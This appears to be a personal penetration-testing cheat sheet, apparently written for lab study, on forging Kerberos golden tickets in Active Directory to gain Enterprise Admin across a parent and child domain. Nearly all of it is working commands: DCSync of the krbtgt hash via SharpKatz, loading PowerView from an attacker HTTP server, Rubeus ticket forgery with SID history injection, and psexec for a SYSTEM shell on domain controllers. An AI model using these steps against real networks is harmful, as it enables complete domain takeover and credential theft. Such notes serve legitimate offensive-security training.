Golden Ticket

Child Domain to Parent Domain

Creating golden ticket to be a part of EA within the parent domain from the child domain

1) Get krbtgt token from the child domain using DCSync

krbtgt -> ffffffffffffffffffffffffffffffff

2) Try to access CIFS on DC02

ls //dc02.domain.com/c$

3) Check the tickets

execute -o klist

4) Get the SIDs for the forest domain and its child

Get-DomainSID -Domain child.domain.com
Get-DomainSid -Domain domain.com
sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/PowerView.ps1 -c "Get-DomainSid -Domain child.domain.com"'
sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/PowerView.ps1 -c "Get-DomainSid -Domain domain.com"'

We get

S-1-5-21-2032401531-514583578-4118012345
S-1-5-21-1135011135-3178090508-3151412345

5) Draft golden ticket - user can be anything bogus - sid is current domain SID and SIDs is child's - Also -519 is the EA group identifier and is static

rubeus -t 30 -- golden /rc4:ffffffffffffffffffffffffffffffff /sid:S-1-5-21-2032401531-514583578-4118012345 /sids:S-1-5-21-1135011135-3178090508-3151412345-519 /ldap /user:Administrator /domain:child.domain.com /nowrap /ptt

6) Check the tickets

execute -o klist

7) Try accessing the C$ now

ls //dc02.domain.com/c$

8) Go into client -> nt auth\system shell and then

psexec -d Title -s Description -p osep-lateral dc02.domain.com

Parent Domain to Child Domain

All this or just add yourself into EA by being a DA on the parent domain

1) DCSync to do SharpKatz - Only the DA -> Admin can do it hence we do runas above

execute-assembly /home/kali/tools/bins/csharp-files/SharpKatz.exe --Command dcsync --User domain.com\\krbtgt --Domain domain.com --DomainController dc01.domain.com

Hashes

krbtgt -> ffffffffffffffffffffffffffffffff

2) Get the SIDs for the domain

Get-DomainSID -Domain domain.com
sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/PowerView.ps1 -c "Get-DomainSid -Domain domain.com"'

We get

domain.com -> S-1-5-21-1725955968-4040474791-670212345

3) Draft golden ticket - user can be anything bogus - sid and sids are same with sids containing group id for EA

rubeus -t 30 -- golden /rc4:ffffffffffffffffffffffffffffffff /sid:S-1-5-21-1725955968-4040474791-670212345 /sids:S-1-5-21-1725955968-4040474791-670212345-519 /ldap /user:Administrator /domain:domain.com /nowrap /ptt

4) Check the tickets

execute -o klist

5) Try accessing the C$ now

ls //dc02.dev.domain.com/c$

6) Go into client -> nt auth\system shell and then

psexec -d Title -s Description -p osep-lateral dc02.dev.domain.com

PreviousAD Lateral Movement NextPassword Change

Last updated 5 months ago

hashtagChild Domain to Parent Domain

hashtag1) Get krbtgt token from the child domain using DCSync

hashtag2) Try to access CIFS on DC02

hashtag3) Check the tickets

hashtag4) Get the SIDs for the forest domain and its child

hashtag5) Draft golden ticket - user can be anything bogus - sid is current domain SID and SIDs is child's - Also -519 is the EA group identifier and is static

hashtag6) Check the tickets

hashtag7) Try accessing the C$ now

hashtag8) Go into client -> nt auth\system shell and then

hashtagParent Domain to Child Domain

hashtag1) DCSync to do SharpKatz - Only the DA -> Admin can do it hence we do runas above

hashtag2) Get the SIDs for the domain

hashtag3) Draft golden ticket - user can be anything bogus - sid and sids are same with sids containing group id for EA

hashtag4) Check the tickets

hashtag5) Try accessing the C$ now

hashtag6) Go into client -> nt auth\system shell and then